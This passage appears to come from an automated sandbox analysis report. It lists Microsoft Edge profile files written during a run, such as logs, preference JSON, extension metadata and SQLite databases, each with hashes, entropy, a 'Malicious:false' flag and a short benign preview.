                                                        SHA-256:FD7F3CEBEBDFF75C6D4A072CB5D702276028AE3E6985A3861C581AA7CDF783C4
                                                        SHA-512:0BDB0C763939088BD7CAF4EDFFBBBBC2AE12AE91FCA44F6BA0DE017EF899E93D9A4C4BEBE5FC5132F05AF44A98B9AD8FE7369FFE15FDF6A2E58B8D8987BC1B77
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:...m.................DB_VERSION.1..U.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13374843191370718..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):311
                                                        Entropy (8bit):5.129563720785533
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:40D4EF7160ED8890CC60A338656D5555
                                                        SHA1:C33DAB5C8DCFADB285428D461F3E57DA42CA0C59
                                                        SHA-256:77CDD42A32BC7374DACE2A00B8542C5F165FD5D6BE244530BA76A3CA44ACFE27
                                                        SHA-512:C2272860C040068D73669B36572EB67A2FCE5DEFA7CE18ECD737D800892E89D3CE7D0785A42E140ACC105667DBBEA2236B5227706D83ADFD8EE1B7487B19FE6B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:10.429 1cc8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/10/31-06:13:10.504 1cc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:modified
                                                        Size (bytes):358860
                                                        Entropy (8bit):5.324611764699601
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CAA6B46EB09D254F05C4853E5A2F1123
                                                        SHA1:CE0932B50745C94367EF77C4E684B0630E9BFB0C
                                                        SHA-256:6102566F8A464A55A1960F7AAB54B63C1437705859B964D52716C540452B6934
                                                        SHA-512:1822717B2CE642883FA7D9C74E1F20F720180733F41030C38C3700089A5CB72DD13943CBC1A996771EBA898607B38B11A2E6D56FC8A1B3595ABB95DA9038BD2D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):418
                                                        Entropy (8bit):1.8784775129881184
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):324
                                                        Entropy (8bit):5.1756950484604465
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BFB700EFC72504674B21A0508BAAF3D8
                                                        SHA1:540C0DC060E2205377DC5F8D3BC70A04906E428C
                                                        SHA-256:2B95D594BAA660AE7B52A69F3D807BC47B1D749E5101936AE759C1F3297BE6D9
                                                        SHA-512:7C86A0BD506FB1700356086E777AE733080D9950DDDA1C4A379871599F2C972C550744BACE7699B7302D1B23616DFEDCC23361063B190C3D5BF4D25C024480BE
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.172 1578 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/10/31-06:13:08.175 1578 Recovering log #3.2024/10/31-06:13:08.176 1578 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):328
                                                        Entropy (8bit):5.175926224854864
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:988F8C2A355578E53C4787CF9C809714
                                                        SHA1:981DEB357EBFAD6470630502FB7245EE761A5BDD
                                                        SHA-256:49B62102E9D4037E5D79D39351266B7138368B02C1781F072FE41D4829ED0994
                                                        SHA-512:FFA947CB28A44538C32670CC31352867551D1D118BD8F152A64F2D0C9A8DBB57614FEBDA557B5C1755B647800D1648BBB00B8C8E62EC505F62F02B1C6C64E454
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.182 1578 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/10/31-06:13:08.184 1578 Recovering log #3.2024/10/31-06:13:08.185 1578 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1254
                                                        Entropy (8bit):1.8784775129881184
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:826B4C0003ABB7604485322423C5212A
                                                        SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                        SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                        SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):324
                                                        Entropy (8bit):5.153128493716035
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:35D77C31DD1C84636448C4CFE99A37A9
                                                        SHA1:2485C885EA7753798651700CA1D7053C82007E36
                                                        SHA-256:89F619D39C418624CA12EB1D30968029AC4BFDDCD3DDBF90704D8E35821EC457
                                                        SHA-512:F2E3A5C6ED4184D49DD5E1466557CD938DD64D4C2FC0282A01A41103FE0067E84F74B3FDD174625E47E31A0AAD65646679728E6D91A2DA779255FE77BDF54574
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.773 1cd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/10/31-06:13:08.773 1cd8 Recovering log #3.2024/10/31-06:13:08.774 1cd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):429
                                                        Entropy (8bit):5.809210454117189
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):155648
                                                        Entropy (8bit):0.5931123483661145
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3FAC812E6622FE611BD7AD4919BDFB9E
                                                        SHA1:FF9190FA82C1E16ADD6EF55DD306758FE8C7A4F5
                                                        SHA-256:1B700F4E5F6FACE39904293BC5C7E85DBAF4585FB145E901841E6630DDD927B2
                                                        SHA-512:D3E77A0B61B2D75F55858D9A07BE2C493DDD4461864513382608BFFEFD723A1208A2B3860E752A0033EA3804CAB1835C06149DEAFD5081B1A3B7CCADEA988D85
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):408
                                                        Entropy (8bit):5.252522279530069
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:5E73415A7E276D8CB3F69E0AA86A29DE
                                                        SHA1:FDEC37E191995B7EF4D1C71FEC354035AD8EF376
                                                        SHA-256:DEB388B153745F4A84BC3644AF874B8C7105F60A544CAD92E61CD37AAEE45B40
                                                        SHA-512:BB98420E0A00B0F2E3A792CA85259546C88E7323E6F9C9DD8C31DC9683F9B8D069ABE7F1F0AB23FC395EA45EC1567B34FD9412CFD39A9A598DE759C41E7C709B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:09.818 1cd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/10/31-06:13:09.819 1cd8 Recovering log #3.2024/10/31-06:13:09.819 1cd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):336
                                                        Entropy (8bit):5.091681789653931
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:88EF6FCAB6AA53422C53D907E14453DE
                                                        SHA1:B6C6EAF24A062F3E493B600040E19C26C2FE5852
                                                        SHA-256:258E3524A753A3FE4341972BFEC43ED8761F74DE9FE8C8277093CF4B62E1B1D6
                                                        SHA-512:E63EFBEB79F1E0681E35FF51ED90198B40F05310DFDBAFCCECEB3246E4D9776CCECF78BDA7A103CFA2F68ECA14ABC8BEF2C1BB6DA03EB2AF99706957DE02EA06
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.322 1ee8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/10/31-06:13:08.324 1ee8 Recovering log #3.2024/10/31-06:13:08.327 1ee8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.7878746238085295
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FC74AF45DC32C4F381DD51C0237DB276
                                                        SHA1:E177E32EC817081F3A47EB4515428C5D3B764ECF
                                                        SHA-256:6C34207AAE190C5756095FE77C7AE38980F4A94CAD963DE1274182ACAA45D0E6
                                                        SHA-512:AD96DA2C9FB96AF14A1ED41DE8881D5ECB27F5B982BAF2A0EA7E3E56EDAEEF54E163A3B8130EA515C481EA93EC7F8187751DD16CE3BDC1EDDD8F53664AC149AD
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6059C07FD9D17EA7504E12CC774FCC2F
                                                        SHA1:D7A52B95ACBEAECF0E133E16BDA86B98AFD0E8B6
                                                        SHA-256:CF6B2DE3B65F976EBDE954B7DB85A36BADBA8E63AA9F1BBE01E3E4F2C71908AE
                                                        SHA-512:115729A7C08C504FD089EA2550FA69ABA8810D6AB9C9F33289A81BDB26BF9E1C5E5A6512937050595CAE9FF0A4575A9B6564B53E5208BA6BF587C8E2A79EB402
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374843188609672","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatm

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF36d22.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6059C07FD9D17EA7504E12CC774FCC2F
                                                        SHA1:D7A52B95ACBEAECF0E133E16BDA86B98AFD0E8B6
                                                        SHA-256:CF6B2DE3B65F976EBDE954B7DB85A36BADBA8E63AA9F1BBE01E3E4F2C71908AE
                                                        SHA-512:115729A7C08C504FD089EA2550FA69ABA8810D6AB9C9F33289A81BDB26BF9E1C5E5A6512937050595CAE9FF0A4575A9B6564B53E5208BA6BF587C8E2A79EB402
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374843188609672","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatm

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3a0d5.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6059C07FD9D17EA7504E12CC774FCC2F
                                                        SHA1:D7A52B95ACBEAECF0E133E16BDA86B98AFD0E8B6
                                                        SHA-256:CF6B2DE3B65F976EBDE954B7DB85A36BADBA8E63AA9F1BBE01E3E4F2C71908AE
                                                        SHA-512:115729A7C08C504FD089EA2550FA69ABA8810D6AB9C9F33289A81BDB26BF9E1C5E5A6512937050595CAE9FF0A4575A9B6564B53E5208BA6BF587C8E2A79EB402
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374843188609672","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatm

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9DBBF73ABA36549E1F1784A748A9FBF3
                                                        SHA1:4988D673979805C1B24FB4D3881D546B93EA9C93
                                                        SHA-256:D0C09D8DC03B0436A6370919BCA0892C02758397EA533A686B0B3815F6E66AD2
                                                        SHA-512:387529ABDE0DE8377FC1D092BC374301BDBD6AE27BB92377D11702493F352A3667948862C246982E85E3B2D8E1F13E0A414909797169BC7911C1EA6532369094
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13374843188169105","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13374843188169105","location":5,"ma

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF382fc.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9DBBF73ABA36549E1F1784A748A9FBF3
                                                        SHA1:4988D673979805C1B24FB4D3881D546B93EA9C93
                                                        SHA-256:D0C09D8DC03B0436A6370919BCA0892C02758397EA533A686B0B3815F6E66AD2
                                                        SHA-512:387529ABDE0DE8377FC1D092BC374301BDBD6AE27BB92377D11702493F352A3667948862C246982E85E3B2D8E1F13E0A414909797169BC7911C1EA6532369094
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13374843188169105","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13374843188169105","location":5,"ma

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):232
                                                        Entropy (8bit):2.7061121767675385
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8A30A1FDD0459D9EA8B1E78A8E636856
                                                        SHA1:9D7225E97F9CFCFB225CFBFD0B0BBA21D4EFDD20
                                                        SHA-256:88FE1D31608930F2738D102D45C75DC77ACDF01A1B69BFB7E7C0281575B75E33
                                                        SHA-512:B529BCE870CD8165BF82F3EBF94F07552467BD0993B9D35145182E54E26FB2AE8E7BB167D88267B632757E2146F27DFDDF8867DB0C66E5DCC306DB12EC6B7BEF
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):324
                                                        Entropy (8bit):5.063642384493518
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:DE167C21238B7498306D6BB6F9704B1F
                                                        SHA1:DB704E6C246488CB3BD70926EB694F71F9350677
                                                        SHA-256:12361136E0598566EB1C2FC29B64BA50A979E8976DF10AF89E89E700427EB09F
                                                        SHA-512:74FE01E4DDE2404CA13A28D8B57B51BCF6613288B4D1C337FC5177F9CA654A0E403E58269CE8AC758FF3DFEB81F7CF44BB3AB8F78C78CD76358085AFB40BABF3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.662 1ee8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/10/31-06:13:08.664 1ee8 Recovering log #3.2024/10/31-06:13:08.668 1ee8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13374843190661658

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):632
                                                        Entropy (8bit):4.023532754490615
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9228D5C9991F057AB3646CB52EA33FA5
                                                        SHA1:6456F41BEE3DE649AB07019FB08F723E06352FDF
                                                        SHA-256:70B6A6E69358169CA3547E03DC053B3377E1AA7F777100751371B12814BE194C
                                                        SHA-512:7B4D5EEF3DEBD33DDEBC3E2291FBA362F215F60946B939BEBDA1739695100E9C030B5817FF1B60D4CB3CD35D5DE37C28D7DD1F9D95BE2CCC74F0350EB059AC2C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:SNSS.........s.............s......"..s.............s.........s.........s.........s....!....s.................................s..s1..,.....s$...fa7152d7_caf8_4c13_81c0_ca6482b98b77.....s.........s....x.,..........s.....s.........................s.........................s....................5..0.....s&...{EF4DAEC1-3482-49FB-8354-00340DC19E1A}.......s............s.........s....!....s.................................s..s1..,.....s$...d0461a85_2471_4b0d_a0b1_3a99b031908d.....s.........s.................s......YY./......s.........s.........s....!....s.................................s....?G......

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
